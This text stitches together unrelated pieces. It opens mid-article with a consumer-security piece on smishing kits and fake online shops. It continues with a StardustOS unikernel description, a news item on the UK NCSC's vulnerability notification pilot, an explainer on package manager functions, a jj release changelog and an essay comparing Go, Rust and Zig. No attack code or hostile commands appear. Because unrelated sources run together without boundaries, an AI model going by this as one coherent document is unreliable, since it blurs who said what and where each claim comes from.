Many SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious. But Merrill said one burgeoning area of growth for these phishing kits — fake e-commerce shops — can be far harder to spot because they do not call attention to themselves by spamming the entire world.
Merrill said the same Chinese phishing kits used to blast out package redelivery message scams are equipped with modules that make it simple to quickly deploy a fleet of fake but convincing e-commerce storefronts. Those phony stores are typically advertised on
Google
and
Facebook
, and consumers usually end up at them by searching online for deals on specific products.
A machine-translated screenshot of an ad from a China-based phishing group promoting their fake e-commerce shop templates.
With these fake e-commerce stores, the customer is supplying their payment card and personal information as part of the normal check-out process, which is then punctuated by a request for a one-time code sent by your financial institution. The fake shopping site claims the code is required by the user’s bank to verify the transaction, but it is sent to the user because the scammers immediately attempt to enroll the supplied card data in a mobile wallet.
According to Merrill, it is only during the check-out process that these fake shops will fetch the malicious code that gives them away as fraudulent, which tends to make it difficult to locate these stores simply by mass-scanning the web. Also, most customers who pay for products through these sites don’t realize they’ve been snookered until weeks later when the purchased item fails to arrive.
“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill said. “They can go months without being shut down, they’re hard to discover, and they generally don’t get flagged by safe browsing tools.”
Happily, reporting these SMS phishing lures and websites is one of the fastest ways to get them properly identified and shut down.
Raymond Dijkxhoorn
is the CEO and a founding member of
SURBL
, a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. SURBL has created a website called
smishreport.com
that asks users to forward a screenshot of any smishing message(s) received.
“If [a domain is] unlisted, we can find and add the new pattern and kill the rest” of the matching domains,
Dijkxhoorn
said. “Just make a screenshot and upload. The tool does the rest.”
The SMS phishing reporting site smishreport.com.
Merrill said the last few weeks of the calendar year typically see a big uptick in smishing — particularly package redelivery schemes that spoof the
U.S. Postal Service
or commercial shipping companies.
“Every holiday season there is an explosion in smishing activity,” he said. “Everyone is in a bigger hurry, frantically shopping online, paying less attention than they should, and they’re just in a better mindset to get phished.”
SHOP ONLINE LIKE A SECURITY PRO
As we can see, adopting a shopping strategy of simply buying from the online merchant with the lowest advertised prices can be a bit like playing Russian Roulette with your wallet. Even people who shop mainly at big-name online stores
can get scammed
if they’re not wary of too-good-to-be-true offers (think third-party sellers on these platforms).
If you don’t know much about the online merchant that has the item you wish to buy, take a few minutes to investigate its reputation. If you’re buying from an online store that is brand new, the risk that you will get scammed increases significantly. How do you know the lifespan of a site selling that must-have gadget at the lowest price? One easy way to get a quick idea is to run
a basic WHOIS search
on the site’s domain name. The more recent the site’s “created” date, the more likely it is a phantom store.
If you receive a message warning about a problem with an order or shipment, visit the e-commerce or shipping site directly, and avoid clicking on links or attachments — particularly missives that warn of some dire consequences unless you act quickly. Phishers and malware purveyors typically seize upon some kind of emergency to create a false alarm that often causes recipients to temporarily let their guard down.
But it’s not just outright scammers who can trip up your holiday shopping: Often times, items that are advertised at steeper discounts than other online stores make up for it by charging way more than normal for shipping and handling.
So be careful what you agree to: Check to make sure you know how long the item will take to be shipped, and that you understand the store’s return policies. Also, keep an eye out for hidden surcharges, and be wary of blithely clicking “ok” during the checkout process.
Most importantly, keep a close eye on your monthly statements. If I were a fraudster, I’d most definitely wait until the holidays to cram through a bunch of unauthorized charges on stolen cards, so that the bogus purchases would get buried amid a flurry of other legitimate transactions. That’s why it’s key to closely review your credit card bill and to quickly dispute any charges you didn’t authorize.
StardustOS: Library operating system for building light-weight Unikernels
Stardust is a unikernel operating system designed to run Cloud applications in a protected, single-address space environment. It delegates the management of physical resources to an underlying hypervisor which is treated as a trusted platform. Stardust has a small code base that can be maintained easily, and relies on static linking to combine a minimal kernel with a single application, along with the libraries and associated programming language run-time required for the execution of the application. Due to static linking, an executable binary of Stardust is packaged within an immutable single-purpose virtual machine image. Stardust supports multiple cores, preemptive threads, and basic block and networking drivers, and provides a collection of standard POSIX-compatible libraries.
Stardust is being used in supporting the teaching and research activities at the University of St Andrews.
Projects
Stardust
provides the unikernel implementation in C.
Jaradat, W., Dearle, A. and Lewis, J. Unikernel support for the deployment of light-weight, self-contained, and latency avoiding services. In the Third Annual UK System Research Challenges Workshop, United Kingdom, 2018.
McKeogh, F.,
Stardust Oxide
, Dissertation, University of St Andrews, United Kingdom.
NCSC's ‘Proactive Notifications’ warns orgs of flaws in exposed devices
Bleeping Computer
www.bleepingcomputer.com
2025-12-04 22:21:12
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment.
The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning.
The NCSC will identify organizations that lack essential security services and will contact them with specific software update recommendations that address unpatched vulnerabilities.
This may include recommendations on specific CVEs or general security issues, such as the use of weak encryption.
“Scanning and notifications will be based on external observations such as the version number publicly advertised by the software,”
NCSC explains
, adding that this activity is “in compliance with the Computer Misuse Act.”
The agency highlights that the emails sent through this service originate from
netcraft.com
addresses, do not include attachments, and do not request payments, personal details, or other types of information.
BleepingComputer learned that the pilot program will cover UK domains and IP addresses from Autonomous System Numbers (ASNs) in the country.
The service will not cover all systems or vulnerabilities, though, and the recommendation is that entities do not rely on it alone for security alerts.
The NCSC also runs Early Warning, a free service that alerts organizations to potential cyberattacks, vulnerabilities, or other suspicious activity in their networks.
It works by aggregating public, private, and government cyber-threat intelligence feeds and cross-referencing them with the domains and IP addresses of enrolled organizations to spot signs of active compromises.
Proactive Notification is triggered before a direct threat or compromise is detected, when NCSC becomes aware of a risk relevant to an organization’s setup.
Together, the two services will form a layered security approach. Proactive Notification helps with hardening systems and reducing risks, while Early Warning will pick up what still manages to slip through.
The NCSC has not provided a timeline for the Proactive Notifications program exiting the pilot phase and becoming more broadly available.
When people think of package managers, they usually picture installing a library, but these days package managers and their associated registries handle dozens of distinct functions.
A package manager is a tool that automates the process of installing, updating, configuring, and removing software packages. In practice, modern language package managers have accumulated responsibilities far beyond this definition.
The client
An installer:
downloads a package archive from the registry, extracts it and places it in your language’s load path so your code can import it.
An updater:
checks for newer versions of installed packages, downloads them, and replaces the old versions, either one at a time or everything at once.
A dependency resolver:
when you install a package, you install its dependencies, and their dependencies, and so on, and the resolver figures out which versions can coexist, which is NP-complete and therefore slow, difficult, and full of trade-offs (see the sketch after this list).
A local cache:
stores downloaded packages on disk so subsequent installs don’t hit the network, enabling offline installs and faster builds while raising questions about cache invalidation when packages change.
A command runner:
executes a package’s CLI tool without permanently installing it by downloading the package, running the command, and cleaning up, which is useful for one-off tasks or trying tools without committing to them.
A script executor:
runs scripts defined in your manifest file, whether build, test, lint, deploy, or any custom command, providing a standard way to invoke project tasks without knowing the underlying tools.
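As a toy illustration of why resolution is the hard part (referenced from the resolver item above), here is a hedged, brute-force sketch over a made-up index. No real package manager resolves this way; real resolvers lean on backtracking, heuristics, or SAT solvers:
from itertools import product

# A made-up index: package -> {version: {dependency: set of allowed versions}}
INDEX = {
    "web": {"2.0": {"json": {"1.0", "2.0"}}, "1.0": {"json": {"1.0"}}},
    "cli": {"1.5": {"json": {"2.0"}}},
    "json": {"1.0": {}, "2.0": {}},
}

def resolve(requirements):
    """Try every combination of versions until one satisfies all constraints.

    Exponential in the number of packages, which is why real resolvers
    need cleverer strategies than exhaustive search.
    """
    names = list(INDEX)
    for combo in product(*(INDEX[name] for name in names)):
        picked = dict(zip(names, combo))
        deps_ok = all(picked[dep] in allowed
                      for name, version in picked.items()
                      for dep, allowed in INDEX[name][version].items())
        roots_ok = all(picked[name] in allowed
                       for name, allowed in requirements.items())
        if deps_ok and roots_ok:
            return picked
    return None

print(resolve({"web": {"1.0", "2.0"}, "cli": {"1.5"}}))
# -> {'web': '2.0', 'cli': '1.5', 'json': '2.0'}: web 1.0 is ruled out because
#    cli 1.5 forces json 2.0, which web 1.0 cannot use.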
Project definition
A manifest format:
a file that declares your project’s dependencies with version constraints, plus metadata like name, version, description, author, license, repository URL, keywords, and entry points, serving as the source of truth for what your project needs.
A lockfile format:
records the exact versions of every direct and transitive dependency that were resolved, often with checksums to verify integrity, ensuring everyone working on the project gets identical dependencies.
Dependency types:
distinguishes between runtime dependencies, development dependencies, peer dependencies, and optional dependencies, each with different semantics for when they get installed and who’s responsible for providing them.
Overrides and resolutions:
lets you force specific versions of transitive dependencies when the default resolution doesn’t work, useful for patching security issues or working around bugs before upstream fixes them.
Workspaces:
manages multiple packages in a single repository, sharing dependencies and tooling across a monorepo while still publishing each package independently.
The registry
An index:
lists all published versions of a package with release dates and metadata, letting you pick a specific version or see what’s available, and is the baseline data most tooling relies on.
A publishing platform:
packages your code into an archive, uploads it to the registry, and makes it available for anyone to install, handling versioning, metadata validation, and release management.
A namespace:
every package needs a unique name, and most registries use flat namespaces where names are globally unique and first-come-first-served, making short names scarce and valuable, though some support scoped names for organizations or use reverse domain notation to avoid conflicts.
A search engine:
the registry website lets you find packages by name, keyword, or category, with results sorted by downloads, recent activity, or relevance, and is often the first place developers go when looking for a library.
A documentation host:
renders READMEs on package pages, displays changelogs, and sometimes generates API documentation from source code, with some registries hosting full documentation sites separate from the package listing.
A download counter:
tracks how often each package and version gets downloaded, helping developers gauge popularity, identify abandoned projects, and make decisions about which libraries to trust.
A dependency graph API:
exposes the full tree of what depends on what, both for individual packages and across the entire registry, which security tools use to trace vulnerability impact and researchers use to study ecosystem structure.
A CDN:
distributes package downloads across edge servers worldwide, and since a popular registry handles billions of requests per week, caching, geographic distribution, and redundancy matter because outages affect millions of builds.
A binary host:
stores and serves precompiled binaries for packages that include native code, with different binaries for different operating systems, architectures, and language versions, saving users from compiling C extensions themselves.
A build farm:
some registries compile packages from source on their own infrastructure, producing binaries that users can trust weren’t tampered with on a developer’s laptop and ensuring consistent build environments.
A mirror:
organizations run internal copies of registries for reliability, speed, or compliance, since some companies need packages to come from their own infrastructure, and registries provide protocols and tooling to make this work.
A deprecation policy:
rules for marking packages as deprecated, transferring ownership of abandoned packages, or removing code entirely, addressing what happens when a maintainer disappears or a package becomes harmful and balancing immutability against the need to fix mistakes.
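Much of the above bottoms out in a plain HTTP API. As a rough sketch of the index role, using npm’s public registry purely as an example, listing a package’s published versions is a single metadata request:

```python
import json
import urllib.request

def list_versions(package: str) -> list[str]:
    # The registry serves one JSON document per package; its "versions"
    # object is keyed by version string and also carries per-version
    # metadata and tarball URLs.
    url = f"https://registry.npmjs.org/{package}"
    with urllib.request.urlopen(url) as resp:
        metadata = json.load(resp)
    # Sorted lexicographically here, not by semver, to keep the sketch short.
    return sorted(metadata["versions"])

if __name__ == "__main__":
    print(list_versions("left-pad"))
```

The same document carries the per-version metadata, tarball URLs, and checksums that the rest of the tooling builds on.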
Security
An authentication system:
publishers need accounts to upload packages, so registries handle signup, login, password reset, two-factor authentication, and API tokens with scopes and expiration, since account security directly affects supply chain security.
An access control system:
registries determine who can publish or modify which packages through maintainer lists, organization teams, and role-based permissions, with some supporting granular controls like publish-only tokens or requiring multiple maintainers to sign off on releases.
Trusted publishing:
some registries allow CI systems to publish packages using short-lived OIDC tokens instead of long-lived secrets, so you don’t have to store credentials in your build environment and compromised tokens expire quickly.
An audit log:
registries record who published what package, when, from what IP address, and using what credentials, useful for forensics after a compromise or just understanding how a package evolved.
Integrity verification:
registries provide checksums that detect corrupted or tampered downloads independent of signatures, so even without cryptographic verification you know you got what the registry sent (see the sketch at the end of this section).
A signing system:
registries support cryptographic signatures that verify who published a package and that it hasn’t been tampered with. Build provenance attestations can prove a package was built from specific source code in a specific environment.
A security advisory database:
registries maintain a catalog of known vulnerabilities mapped to affected package versions, so when a CVE is published they track which packages and version ranges are affected and tools can warn users.
A vulnerability scanner:
checks your installed dependencies against the advisory database and flags packages with known security issues, often running automatically during install or as a separate audit command.
A malware scanner:
registries analyze uploaded packages for malicious code before or after they’re published, where automated static analysis catches obvious patterns but sophisticated attacks often require human review.
A typosquatting detector:
registries scan for package names that look like misspellings of popular packages, which attackers register to catch developers who mistype an install command, and try to detect and block them before they cause harm.
An SBOM generator:
produces software bills of materials listing every component in your dependency tree, used for compliance, auditing, and tracking what’s actually running in production.
A security team:
registries employ people who triage vulnerability reports, investigate suspicious packages, coordinate takedowns, and respond to incidents, because automation helps but humans make the judgment calls.
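To give a feel for the integrity-verification piece, here is a rough sketch that re-checks a downloaded tarball against the checksum the registry advertises. It assumes an npm-style `dist` record whose `integrity` field is an SRI string like `sha512-<base64 digest>`; other registries expose the same idea under different field names.

```python
import base64
import hashlib
import json
import urllib.request

def verify(package: str, version: str) -> bool:
    # Fetch the version's metadata, which includes the tarball URL and
    # an SRI integrity string such as "sha512-<base64 digest>".
    meta_url = f"https://registry.npmjs.org/{package}/{version}"
    with urllib.request.urlopen(meta_url) as resp:
        dist = json.load(resp)["dist"]

    with urllib.request.urlopen(dist["tarball"]) as resp:
        tarball = resp.read()

    algorithm, _, expected = dist["integrity"].partition("-")
    digest = base64.b64encode(hashlib.new(algorithm, tarball).digest()).decode()
    return digest == expected

if __name__ == "__main__":
    print(verify("react", "18.2.0"))
```

Signatures and provenance attestations go a step further: the checksum proves you got what the registry has, while a signature proves who put it there.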
So what is a package manager? It depends how far you zoom out. At the surface, it’s a command that installs libraries. One level down, it’s a dependency resolver and a reproducibility tool. Further still, it’s a publishing platform, a search engine, a security operation, and part of global infrastructure.
And how does all of this get funded and supported on an ongoing basis? Sponsorship programs, foundation grants, corporate backing, or just volunteer labor - it varies widely and often determines what’s possible.
301 redirects are being issued towards the new domain, so any existing links should not be broken.
Fixed race condition that could cause divergent operations when running concurrent `jj` commands in colocated repositories. It is now safe to continuously run e.g. `jj log` without `--ignore-working-copy` in one terminal while you're running other commands in another terminal. #6830
`jj` now ignores `$PAGER` set in the environment and uses `less -FRX` on most platforms (`:builtin` on Windows). See the docs for more information, and #3502 for motivation.
Breaking changes
In filesets or path patterns, glob matching is enabled by default. You can use `cwd:"path"` to match literal paths.
In the following commands, string pattern arguments are now parsed the same way they are in revsets and can be combined with logical operators: `jj bookmark delete`/`forget`/`list`/`move`, `jj tag delete`/`list`, `jj git clone`/`fetch`/`push`.
In the following commands, unmatched bookmark/tag names are no longer an error. A warning will be printed instead: `jj bookmark delete`/`forget`/`move`/`track`/`untrack`, `jj tag delete`, `jj git clone`/`push`.
The default string pattern syntax in revsets will be changed to `glob:` in a future release. You can opt in to the new default by setting `ui.revsets-use-glob-by-default=true`.
The minimum supported Rust version (MSRV) is now 1.89.
On macOS, the deprecated config directory `~/Library/Application Support/jj` is not read anymore. Use `$XDG_CONFIG_HOME/jj` instead (defaults to `~/.config/jj`).
Sub-repos are no longer tracked. Any directory containing `.jj` or `.git` is ignored. Note that Git submodules are unaffected by this.
Deprecations
The `--destination`/`-d` arguments for `jj rebase`, `jj split`, `jj revert`, etc. were renamed to `--onto`/`-o`. The reasoning is that `--onto`, `--insert-before`, and `--insert-after` are all destination arguments, so calling one of them `--destination` was confusing and unclear. The old names will be removed at some point in the future, but we realize that they are deep in muscle memory, so you can expect an unusually long deprecation period.
`jj describe --edit` is deprecated in favor of `--editor`.
The config options `git.auto-local-bookmark` and `git.push-new-bookmarks` are deprecated in favor of `remotes.<name>.auto-track-bookmarks`. For example:
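A minimal sketch, assuming a remote named `origin` and a pattern that auto-tracks every new bookmark (see the jj docs for the exact pattern syntax):

```toml
# Hypothetical example: auto-track all new bookmarks on the "origin" remote.
[remotes.origin]
auto-track-bookmarks = "glob:*"
```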
The flag `--allow-new` on `jj git push` is deprecated. In order to push new bookmarks, please track them with `jj bookmark track`. Alternatively, consider setting up an auto-tracking configuration to avoid the chore of tracking bookmarks manually. For example:
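A sketch of such a configuration, assuming a remote named `origin` and an illustrative `yourname/` bookmark prefix (you could also track a single bookmark explicitly with `jj bookmark track my-feature@origin`):

```toml
# Hypothetical example: only auto-track bookmarks under your own prefix.
[remotes.origin]
auto-track-bookmarks = "glob:yourname/*"
```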
New features

`jj commit`, `jj describe`, `jj squash`, and `jj split` now accept `--editor`, which ensures an editor will be opened with the commit description even if one was provided via `--message`/`-m`.
All `jj` commands show a warning when the provided fileset expression doesn't match any files.
Added `files()` template function to `DiffStats`. This supports per-file stats like `lines_added()` and `lines_removed()`.
Added `join()` template function. This is different from `separate()` in that it adds a separator between all arguments, even if empty.
The `RepoPath` template type now has an `absolute() -> String` method that returns the absolute path as a string.
Added `format_path(path)` template that controls how file paths are printed with `jj file list`.
New built-in revset aliases `visible()` and `hidden()`.
Unquoted `*` is now allowed in revsets. `bookmarks(glob:foo*)` no longer needs quoting.
`jj prev/next --no-edit` now generates an error if the working copy has children.
A new config option `remotes.<name>.auto-track-bookmarks` can be set to a string pattern. New bookmarks matching it will be automatically tracked for the specified remote. See the docs.
`jj log` now supports a `--count` flag to print the number of commits instead of displaying them.
Fixed bugs
`jj fix` now prints a warning if a tool failed to run on a file. #7971
Shell completion now works with non-normalized paths, fixing the previous panic and allowing prefixes containing `.` or `..` to be completed correctly. #6861
Shell completion now always uses forward slashes to complete paths, even on Windows. This makes completion results usable when running `jj` in Git Bash. #7024
Unexpected keyword arguments now return a parse failure for the `coalesce()` and `concat()` templating functions.
The Nushell completion script documentation now adds the `-f` option, keeping it up to date. #8007
Ensured that with Git submodules, remnants of your submodules do not show up in the working copy after running `jj new`. #4349
Contributors
Thanks to the people who made this release happen!
I realized recently that rather than using “the right tool for the job” I’ve been using the tool *at* the job and that’s mostly determined the programming languages I know. So over the last couple months I’ve put a lot of time into experimenting with languages I don’t get to use at work. My goal hasn’t been proficiency; I’m more interested in forming an opinion on what each language is good for.
Programming languages differ along so many axes that it can be hard to compare
them without defaulting to the obviously true but 1) entirely boring and 2)
not-that-helpful conclusion that there are trade-offs. Of course there are
trade-offs. The important question is, why did this language commit to this
particular set of trade-offs?
That question is interesting to me because I don’t want to choose a language
based on a list of features as if I were buying a humidifier. I care about
building software and I care about my tools. In making the trade-offs they
make, languages express a set of values. I’d like to find out which values
resonate with me.
That question is also useful in clarifying the difference between languages
that, at the end of the day, have feature sets that significantly overlap. If
the number of questions online about “Go vs. Rust” or “Rust vs. Zig” is a
reliable metric, people are confused. It’s hard to remember, say, that language *X* is better for writing web services because it has features *a*, *b*, and *c* whereas language *Y* only has features *a* and *b*. Easier, I think, to remember that language *X* is better for writing web services because language *Y* was designed by someone who hates the internet (let’s imagine) and believes we should unplug the whole thing.
I’ve collected here my impressions of the three languages I’ve experimented
with lately: Go, Rust, and Zig. I’ve tried to synthesize my experience with
each language into a sweeping verdict on what that language values and how well
it executes on those values. This might be reductive, but, like, crystallizing
a set of reductive prejudices is sort of what I’m trying to do here.
Go
Go is distinguished by its minimalism. It has been described as “a modern C.”
Go isn’t like C, because it is garbage-collected and has a real run-time, but it *is* like C in that you can fit the whole language in your head.
You can fit the whole language in your head because Go has so few features. For
a long time, Go was notorious for not having generics. That was finally changed
in Go 1.18, but that was only after 12 years of people begging for generics to
be added to the language. Other features common in modern languages, like tagged
unions or syntactic sugar for error-handling, have not been added to Go.
It seems the Go development team has a high bar for adding features to the
language. The end result is a language that forces you to write a lot of
boilerplate code to implement logic that could be more succinctly expressed in
another language. But the result is also a language that is stable over time
and easy to read.
To give you another example of Go’s minimalism, consider Go’s slice type. Both
Rust and Zig have a slice type, but these are fat pointers and fat pointers
only. In Go, a slice is a fat pointer to a contiguous sequence in memory, but a
slice can also grow, meaning that it subsumes the functionality of Rust’s `Vec<T>` type and Zig’s `ArrayList`. Also, since Go is managing your memory for you, Go will decide whether your slice’s backing memory lives on the stack or the heap; in Rust or Zig, you have to think much harder about where your memory lives.
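A minimal illustration of that point, using nothing beyond the standard library: the same `[]int` value is both a view into memory and a growable container, and Go decides where the backing array lives.

```go
package main

import "fmt"

func main() {
    // A slice is a fat pointer: pointer, length, capacity.
    s := make([]int, 0, 2)

    // But it also grows: append allocates a bigger backing array when
    // capacity runs out, which is the job Rust's Vec<T> and Zig's
    // ArrayList do on top of their plain, fixed-size slice types.
    for i := 0; i < 5; i++ {
        s = append(s, i)
        fmt.Println(len(s), cap(s), s)
    }
}
```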
Go’s origin myth, as I understand it, is basically this: Rob Pike was sick
of waiting for C++ projects to compile and was sick of other programmers at
Google making mistakes in those same C++ projects. Go is therefore simple where
C++ is baroque. It is a language for the programming rank and file, designed to
be sufficient for 90% of use cases while also being easy to understand, even
(perhaps especially) when writing concurrent code.
I don’t use Go at work, but I think I should. Go is minimal in
service of corporate collaboration. I don’t mean that as a slight—building
software in a corporate environment has its own challenges, which Go solves
for.
Rust
Where Go is minimalist, Rust is maximalist. A tagline often associated with
Rust is “zero-cost abstractions.” I would amend that to read, “zero-cost
abstractions, and lots of them!”
Rust has a reputation for being hard to learn. I agree with Jamie Brandon, who writes that it’s not lifetimes that make Rust difficult, it’s the number of concepts stuffed into the language. I’m not the first person to pick on this particular Github comment, but it perfectly illustrates the conceptual density of Rust:
The type `Pin<&LocalType>` implements `Deref<Target = LocalType>` but it doesn’t implement `DerefMut`. The types `Pin` and `&` are `#[fundamental]` so that an `impl DerefMut for Pin<&LocalType>` is possible. You can use `LocalType == SomeLocalStruct` or `LocalType == dyn LocalTrait` and you can coerce `Pin<Pin<&SomeLocalStruct>>` into `Pin<Pin<&dyn LocalTrait>>`.

(Indeed, two layers of Pin!!) This allows creating a pair of “smart pointers that implement `CoerceUnsized` but have strange behavior” on stable (`Pin<&SomeLocalStruct>` and `Pin<&dyn LocalTrait>` become the smart pointers with “strange behavior” and they already implement `CoerceUnsized`).
Of course, Rust isn’t trying to be maximalist the same way Go is trying to be
minimalist. Rust is a complex language because what it’s trying to do is
deliver on two goals—safety and performance—that are somewhat in tension.
The performance goal is self-explanatory. What “safety” means is less clear; at
least it was to me, though maybe I’ve just been Python-brained for too long.
“Safety” means “memory safety,” the idea that you shouldn’t be able to
dereference an invalid pointer, or do a double-free, etc. But it also means more
than that. A “safe” program avoids all undefined behavior (sometimes referred
to as “UB”).
What is the dreaded UB? I think the best way to understand it is to remember
that, for any running program, there are FATES WORSE THAN DEATH. If something
goes wrong in your program, immediate termination is great actually! Because
the alternative, if the error isn’t caught, is that your program crosses over
into a twilight zone of unpredictability, where its behavior might be
determined by which thread wins the next data race or by what garbage happens
to be at a particular memory address. Now you have heisenbugs and security
vulnerabilities. Very bad.
Rust tries to prevent UB without paying any run-time performance penalty by
checking for it at compile-time. The Rust compiler is smart, but it’s not
omniscient. For it to be able to check your code, it has to understand what
your code will do at run-time. And so Rust has an expressive type system
and a menagerie of traits that allow you to express, to the compiler, what in
another language would just be the apparent run-time behavior of your code.
This makes Rust hard, because you can’t just *do* the thing! You have to find out Rust’s name for the thing—find the trait or whatever you need—then implement it as Rust expects you to. But if you do this, Rust can make guarantees about the behavior of your code that other languages cannot, which depending on your application might be crucial. It can also make guarantees about *other people’s* code, which makes consuming libraries easy in Rust and explains why Rust projects have almost as many dependencies as projects in the JavaScript ecosystem.
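As a small, hedged example of what “finding Rust’s name for the thing” looks like: to hand a closure to another thread, you don’t just hope it’s safe to do so; you state it in the signature with the `Send` trait, and the compiler checks it for every caller.

```rust
use std::thread;

// The bound is the guarantee: whatever the closure captures must be safe to
// move to another thread (`Send`) and must not borrow short-lived data
// (`'static`). Violations are compile errors, not run-time surprises.
fn run_in_background<F>(job: F) -> thread::JoinHandle<()>
where
    F: FnOnce() + Send + 'static,
{
    thread::spawn(job)
}

fn main() {
    let data = vec![1, 2, 3];
    // Moving `data` into the closure makes the closure `Send`.
    let handle = run_in_background(move || {
        println!("sum = {}", data.iter().sum::<i32>());
    });
    handle.join().unwrap();
}
```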
Zig
Of the three languages, Zig is the newest and least mature. As of this writing,
Zig is only on version 0.14. Its standard library has almost zero documentation
and the best way to learn how to use it is to consult the source code directly.
Although I don’t know if this is true, I like to think of Zig as a reaction to
both Go and Rust. Go is simple because it obscures details about how the
computer actually works. Rust is safe because it forces you to jump through its
many hoops. Zig will set you free! In Zig, you control the universe and nobody
can tell you what to do.
In both Go and Rust, allocating an object on the heap is as easy as returning a pointer to a struct from a function. The allocation is implicit. In Zig, you allocate every byte yourself, explicitly. (Zig has manual memory management.) You have more control here than you have even in C: To allocate bytes, you have to call `alloc()` on a specific kind of allocator, meaning you have to decide on the best allocator implementation for your use case.
In Rust, creating a mutable global variable is so hard that there are long forum discussions on how to do it. In Zig, you can just create one, no problem.
Undefined behavior is still important in Zig. Zig calls it “illegal behavior.”
It tries to detect it at run-time and crash the program when it occurs. For
those who might worry about the performance cost of these checks, Zig offers
four different “release modes” that you can choose from when you build your
program. In some of these, the checks are disabled. The idea seems to be that
you can run your program enough times in the checked release modes to have
reasonable confidence that there will be no illegal behavior in the unchecked
build of your program. That seems like a highly pragmatic design to me.
Another difference between Zig and the other two languages is Zig’s
relationship to object-oriented programming. OOP has been out of favor for a
while now and both Go and Rust eschew class inheritance. But Go and Rust have
enough support for other object-oriented programming idioms that you could
still construct your program as a graph of interacting objects if you wanted
to. Zig has methods, but no private struct fields and no language feature
implementing run-time polymorphism (AKA dynamic dispatch), even though `std.mem.Allocator` is dying to be an interface. As best as I can tell, these exclusions are intentional; Zig is a language for data-oriented design.
One more thing I want to say about this, because I found it eye-opening: It
might seem crazy to be building a programming language with manual memory
management in 2025, especially when Rust has shown that you don’t even need
garbage collection and can let the compiler do it for you. But this is a design
choice very much related to the choice to exclude OOP features. In Go and Rust
and so many other languages, you tend to allocate little bits of memory at a
time for each object in your object graph. Your program has thousands of little hidden `malloc()`s and `free()`s, and therefore thousands of different lifetimes. This is RAII. In Zig, it might seem like manual memory management would require lots of tedious, error-prone bookkeeping, but that’s only if you insist on tying memory allocations to all your little objects. You could instead just allocate and free big chunks of memory at certain sensible points in your program (like at the start of each iteration of your event loop), and use that memory to hold the data you need to operate on. It’s this approach that Zig encourages.
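Here is a rough sketch of that style in Zig (written against a recent 0.x release, so details may shift): one arena serves a whole unit of work, and everything allocated from it is freed in a single call rather than object by object.

```zig
const std = @import("std");

pub fn main() !void {
    // One arena per "frame" of work; its child allocator supplies the
    // big underlying chunks.
    var arena = std.heap.ArenaAllocator.init(std.heap.page_allocator);
    defer arena.deinit(); // frees everything allocated below, all at once

    const allocator = arena.allocator();

    // Allocate as many little pieces as the work needs...
    const numbers = try allocator.alloc(u32, 100);
    const label = try allocator.dupe(u8, "per-frame scratch data");

    // ...use them, and never free them individually.
    numbers[0] = 42;
    std.debug.print("{s}: {d}\n", .{ label, numbers[0] });
}
```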
Many people seem confused about why Zig should exist if Rust does already. It’s not just that Zig is trying to be simpler. I think this difference is the more important one. Zig wants you to excise even more object-oriented thinking from your code.
Zig has a fun, subversive feel to it. It’s a language for smashing the
corporate class hierarchy (of objects). It’s a language for megalomaniacs and
anarchists. I like it. I hope it gets to a stable release soon, though the Zig
team’s current priority seems to be rewriting all of their dependencies. It’s not impossible they try to rewrite the Linux kernel before we see Zig 1.0.